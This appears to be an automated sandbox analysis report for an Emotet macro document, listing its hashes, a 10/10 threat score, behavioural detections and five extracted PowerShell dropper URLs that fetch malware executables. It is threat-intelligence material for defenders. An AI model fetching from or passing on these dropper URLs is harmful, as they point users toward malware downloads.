Overview

overview

10

Static

static

8

emotet_doc2

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

  • Size

    173KB

  • Sample

    210519-dmpssjm4p2

  • MD5

    b591371308b94b1ca5545841fb64fbd7

  • SHA1

    424d456e7e8a09a1cddb821b8f7eeb9b0dc3effb

  • SHA256

    9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

  • SHA512

    ff0d0e352d05232c62642e576cc9e14e05630dfc59bff0b7c08399a108ced404824a76150561a1eb61ae28d856bcc6d46bb9848ad8497d6fb68778b7ac15f0e0

Score
10/10
macro

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://suidi.com/IdWaI
exe.dropper

http://spprospekt.com.br/WCH
exe.dropper

http://sportpony.ch/R1c
exe.dropper

http://regenerationcongo.com/imiK6
exe.dropper

http://procoach.jp/newfolde_r/Q8G8Tdg

Targets

    • Target

      9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

    • Size

      173KB

    • MD5

      b591371308b94b1ca5545841fb64fbd7

    • SHA1

      424d456e7e8a09a1cddb821b8f7eeb9b0dc3effb

    • SHA256

      9eb5ebf4950818df9294072543535ab5bf97a9af906b2c14909a7c79445250cf

    • SHA512

      ff0d0e352d05232c62642e576cc9e14e05630dfc59bff0b7c08399a108ced404824a76150561a1eb61ae28d856bcc6d46bb9848ad8497d6fb68778b7ac15f0e0

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

    behavioral1

MITRE ATT&CK Enterprise v6

Tasks